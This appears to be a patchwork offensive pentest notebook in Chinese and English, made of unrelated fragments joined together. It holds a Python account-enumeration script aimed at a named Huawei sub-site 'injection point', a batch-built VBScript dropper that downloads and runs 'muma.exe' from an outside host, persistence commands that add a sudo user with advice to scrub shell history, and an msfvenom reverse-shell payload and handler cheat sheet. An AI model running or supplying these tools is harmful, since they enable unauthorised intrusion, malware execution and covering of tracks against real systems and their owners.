#coding=utf8
import gzip
import json
import sys
import tarfile
import threading
import time
import urllib
import urllib2

import msgpack

# Newline-separated account names that enum() decides are "complete"; appended to by
# enum() through `global result` and flushed to disk once at the end of the script.
result = ""

# Output file for the enumerated names. Opened eagerly at import time and closed by the
# script's last statements, so nothing else should close or reopen it.
f = open("data.txt", "w")
#MyThread.py线程类
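class MyThread(threading.Thread):
    """Run ``func(*args)`` on a worker thread and hand the return value back via get_result().

    The constructor was written as ``init`` (the underscores were lost), so Thread's own
    ``__init__`` received ``func``/``args`` as ``group``/``target`` and the worker never ran
    the probe; this defines the real ``__init__``.

    func:  callable executed on the worker thread.
    args:  tuple of positional arguments for ``func``.
    delay: seconds to sleep before calling ``func`` (default 2, the original hard-coded pause);
           pass 0 to fire immediately.
    """

    def __init__(self, func, args=(), delay=2):
        super(MyThread, self).__init__()
        self.func = func
        self.args = args
        self.delay = delay
        # Stays None until run() completes; also the value reported if func raises.
        self.result = None

    def run(self):
        # Crude rate limiting: every worker started by enum() waits before probing so the
        # target is not hit by the whole batch in the same instant.
        if self.delay:
            time.sleep(self.delay)
        self.result = self.func(*self.args)

    def get_result(self):
        """Block until the thread has finished, then return func's result (None if it raised)."""
        self.join()
        return self.result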

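def request(surestr, timeout=30):
    """POST one wildcard probe and return ``"<surestr>|<response body length>"``.

    The body length is the oracle enum() compares against its no-match length. Returns None
    when the reply is not HTTP 200. On a 4xx/5xx reply the status code and body are printed
    and the urllib2.HTTPError is re-raised (the calling MyThread then reports None).

    timeout: socket timeout in seconds. Without one a stalled connection blocks the worker
             thread forever and enum(), which joins every worker, never completes.
    """
    # Target endpoint is redacted in this listing (the path literally reads
    # "Huawei sub-site injection point"); substitute the real URL before use.
    url = "http://华为分站注入点/"
    values = {"reason": "", "coopAccount": surestr, "activateType": "p@sswordReset"}
    data = urllib.urlencode(values)
    req = urllib2.Request(url, data)
    try:
        res_data = urllib2.urlopen(req, timeout=timeout)
    except urllib2.HTTPError as err:
        print(err.code)
        print(err.read())
        raise
    try:
        body = res_data.read()
        if res_data.getcode() == 200:
            return surestr + "|" + str(len(body))
        return None
    finally:
        # Release the connection even when the status check fails; the original leaked it.
        res_data.close()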

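def enum(surestr, nomatch_len="53"):
    """Recursively extend the prefix ``surestr`` one character at a time via wildcard probes.

    For every candidate character a ``request(prefix + char + "*")`` is fired on its own
    MyThread. A reply whose body length differs from ``nomatch_len`` is taken as "at least
    one account matches this longer prefix" and is recursed into. A prefix that no character
    extends is printed as complete and appended (with a newline) to the module-level
    ``result``. Returns None.

    nomatch_len: body length, as the string request() embeds after "|", that the target
                 returns when nothing matches. "53" is what was observed for the original
                 target; re-measure it before pointing this at anything else.
    """
    global result
    # '0' was missing from the original set, so any account containing a zero could never be
    # found. Case is not varied: the probe is assumed to match case-insensitively, which only
    # the target can confirm.
    enumchars = "qwertyuioplkjhgfdsazxcvbnm-_0123456789.@()"
    if surestr == "*":
        surestr = ""  # the initial call passes a bare wildcard; treat it as the empty prefix
    workers = []
    for ch in enumchars:
        worker = MyThread(request, (surestr + ch + "*",))
        workers.append(worker)
        worker.start()
    extended = False
    for worker in workers:
        # get_result() joins the thread itself; it yields None when request() returned None
        # (non-200) or raised, which the original code then crashed on with .split().
        retcode = worker.get_result()
        if retcode is None:
            # Treating a failed probe as "no match" can produce a false "Complete" below, but
            # it is better than aborting the whole run on one flaky request.
            continue
        prefix, body_len = retcode.split("|", 1)
        if body_len == nomatch_len:
            continue
        sys.stdout.write("\rGot:" + prefix)
        sys.stdout.flush()
        enum(prefix.strip("*"), nomatch_len)
        extended = True
    if not extended:
        sys.stdout.write("\rComplete:" + surestr + "\n")
        result = result + surestr + "\n"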

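# Entry point: enumerate everything reachable from the empty prefix, then persist the
# module-level `result` that enum() filled in. enum() returns None, so printing its return
# value (as the original did) only emitted "None"; the file is now closed even if
# enumeration dies part-way through.
try:
    enum("*")
    f.write(result)
finally:
    f.close()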

REM Writes zl.vbs line by line: a VBScript that fetches an executable over plain HTTP from a
REM hard-coded third-party host, saves it to c:\zl.exe and runs it. Nothing verifies what is
REM downloaded (no TLS, no hash, no signature), so whoever controls that host or the network
REM path gets code execution as the user running the script.
REM NOTE(review): the quotes in this listing are typographic (“ ”); the generated .vbs will
REM not parse until they are replaced with ASCII double quotes.
echo Set Post = CreateObject(“Msxml2.XMLHTTP”) >>zl.vbs
echo Set Shell = CreateObject(“Wscript.Shell”) >>zl.vbs
REM Third argument 0 (False) makes the request synchronous, so responseBody is complete after Send.
echo Post.Open “GET”,”http://www.jbzj.com/muma.exe”,0 >>zl.vbs
echo Post.Send() >>zl.vbs
REM ADODB.Stream constants: Mode 3 = read/write, Type 1 = binary, SaveToFile option 2 = overwrite.
echo Set aGet = CreateObject(“ADODB.Stream”) >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile “c:\zl.exe”,2 >>zl.vbs
REM One-second pause before launching, presumably to let the file handle be released.
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run (“c:\zl.exe”) >>zl.vbs

权限维持

添加用户,非交互式设置密码并加入 sudo 组(下面三条命令针对同一个账户,这里统一用 python32;原笔记第三条写的是 username,与前两条不一致):
adduser python32
echo 'python32:password' | chpasswd
gpasswd -a python32 sudo
注意:密码以明文出现在命令行,会留在 shell 历史(如 ~/.bash_history)里,执行完记得清理对应记录。
移动 home 目录(-m 会把旧目录内容一起迁移过去):sudo usermod -d /path/to/new/home -m python32

文件下载

tar -cvf log.tar log2012.log 仅打包,不压缩!
tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩
tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩

python -m SimpleHTTPServer 8001
(仅 Python 2;Python 3 用 python3 -m http.server 8001。默认监听 0.0.0.0,当前目录下所有文件都会暴露给任何能访问该端口的人,文件传完立刻 Ctrl-C 停掉。)

<?php
// Diagnostic probe: report whether the request body was parsed as form data.
// $_POST is only populated for application/x-www-form-urlencoded and multipart/form-data
// bodies, so a JSON or raw body will always print UNSET here.
echo isset($_POST["AAA"]) ? "ISSET" : "UNSET";

这里要构造表单的
<!-- Submits a urlencoded POST to the test endpoint so PHP populates $_POST.
     The enctype must stay application/x-www-form-urlencoded (or multipart/form-data);
     any other Content-Type leaves $_POST empty. Target IP is an internal test host. -->
<form method="POST"
      action="http://10.16.83.113/exec.php"
      enctype="application/x-www-form-urlencoded">
  <input type="text" name="radiobutton" value="homeway">
  <input type="text" name="key" value="nokey">
  <input type="submit" value="submit">
</form>

或者直接在 Burp 里改请求,但请求头必须是 Content-Type: application/x-www-form-urlencoded(或 multipart/form-data),否则 PHP 不会解析请求体去填充 $_POST,上面的脚本会一直输出 UNSET。

List payloads
msfvenom -l payloads
(In the examples below the values after LHOST= and LPORT= were lost in extraction; read them as LHOST=<your listener IP> LPORT=<your listener port>.)
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
(macOS only: pbcopy/pbpaste are the clipboard tools. The step prepends a `<?php ` open tag to the raw payload. Portable equivalent: `{ printf '<?php '; cat shell.php; } > shell2.php && mv shell2.php shell.php`.)
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see `msfvenom --help-formats` for the valid output formats. Msfvenom will emit the shellcode as source in the chosen language so it can be pasted straight into your exploit.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f <format>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f <format>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<your IP> LPORT=<your port> -f <format>
(<format> is the source language to emit, e.g. c, python, ruby, csharp — the placeholder in angle brackets was stripped from this listing.)
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format; PAYLOAD, LHOST and LPORT must match exactly what was baked into the msfvenom payload, or the callback is dropped.
use exploit/multi/handler
set PAYLOAD <payload name used with msfvenom>
set LHOST <listening IP>
set LPORT <listening port>
set ExitOnSession false
exploit -j -z
Once the required values are completed, save them as a resource script and start the handler with 'msfconsole -L -r <handler.rc>'.